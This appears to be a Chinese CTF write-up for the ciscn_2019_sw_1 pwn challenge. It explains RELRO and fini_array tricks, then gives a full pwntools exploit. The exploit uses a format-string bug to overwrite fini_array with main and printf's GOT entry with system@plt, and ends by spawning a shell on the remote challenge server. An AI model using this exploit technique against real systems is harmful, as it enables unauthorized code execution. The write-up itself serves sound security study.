ciscn_2019_sw_1:
主要参考这位师傅:https://www.cnblogs.com/LynneHuan/p/14660529.html#%E7%9F%A5%E8%AF%86%E7%82%B9
先引用下:
- 当RELRO保护为NO RELRO的时候,init.array、fini.array、got.plt均可读可写;
- 为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写;
- 为FULL RELRO时,init.array、fini.array、got.plt均可读不可写。
- 程序在加载的时候,会依次调用init.array数组中的每一个函数指针,在结束的时候,依次调用fini.array中的每一个函数指针
- 当程序出现格式化字符串漏洞,但是需要写两次才能完成攻击,这个时候可以考虑改写fini.array中的函数指针为main函数地址,可以再执行一次main函数。一般来说,这个数组的长度为1,也就是说只能写一个地址。
程序分析:
这边有个格式化字符串漏洞,长度限制64
大致步骤:
我们用格式字符串漏洞改写fini_array为main的地址,改写print_got为system_plt
(改写fini_array为main,就能无限循环
改写print_got为system_plt在第二次main填入/bin/sh就能getshell)
exp:
from pwn import *
local_file = './ciscn_2019_sw_1'
local_libc = './libc-2.27.so'
remote_libc = './libc-2.27.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node4.buuoj.cn',26724 )
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
def debug(cmd=''):
gdb.attach(r,cmd)
#-----------------------------
_sys=0x804851b
command=0x08048640
system_plt=0x080483D0
fini_array0=0x0804979c
main=0x8048534
printf_got=0x0804989C
offest=4
payload=p32(printf_got+2)+p32(fini_array0+2)+p32(printf_got)+p32(fini_array0)
payload+='%'+str(0x0804-0x10)+'c%4$hn'+'%5$hn'+'%'+str(0x83d0-0x0804)+'c%6$hn'+'%'+str(0x8534-0x83d0)+'c%7$hn'
sla('Welcome to my ctf! What\'s your name?\n',payload)
sl('/bin/sh\x00')
#debug()
r.interactive()
其他:
记一下怎么找fini_array的地址
或者用
elf.sym[’__init_array_end’]